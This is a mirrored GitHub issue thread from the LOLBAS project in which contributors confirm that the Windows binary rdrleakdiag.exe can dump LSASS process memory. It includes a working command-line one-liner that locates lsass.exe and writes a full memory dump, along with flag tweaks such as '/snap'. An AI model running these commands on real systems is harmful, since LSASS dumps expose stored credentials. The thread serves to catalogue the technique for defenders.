Giter Club home page Giter Club logo

Comments (8)

gladiatx0r avatar gladiatx0r commented on May 29, 2024 2

FYI, you can skip running "wait" for the first run, if you run enable first. This has the added benefit of working regardless of what was already run;

for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rdrleakdiag.exe -p %J -enable & sleep 1 & rdrleakdiag.exe -p %J -o c:\users\maximus\desktop\dumps -fullmemdmp -snap

I found the sleep was necessary to give the diagnostics engine/feature/module(?) time to start before running the dump.

from lolbas.

gtworek avatar gtworek commented on May 29, 2024

Please do remember about "/snap" instead of "/wait 1" for subsequent dumps. I had some replies on twitter with an information it works only once, and "/snap" looks like a kind of solution for this.

from lolbas.

ConsciousHacker avatar ConsciousHacker commented on May 29, 2024

Will do, thanks for the information!

from lolbas.

tsamuels-r7 avatar tsamuels-r7 commented on May 29, 2024

I just validated this process dump method. Please consider adding this native windows binary to the LOLBAS project.

C:\WINDOWS\system32>rdrleakdiag.exe /p <PID> /o <PATH> /fullmemdmp /snap

from lolbas.

noob-Engle avatar noob-Engle commented on May 29, 2024

winserver 2019 Copy execution not successful

from lolbas.

gtworek avatar gtworek commented on May 29, 2024

May work if you try again replacing "/wait 1" with "/snap"
I have tested it on 10.0.17763.379.

from lolbas.

XiaoliChan avatar XiaoliChan commented on May 29, 2024

May work if you try again replacing "/wait 1" with "/snap" I have tested it on 10.0.17763.379.

Well, both have already try, it didn't work.

from lolbas.

wietze avatar wietze commented on May 29, 2024

#216 has added rdrleakdiag.exe, I'm closing this issue for now.

from lolbas.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.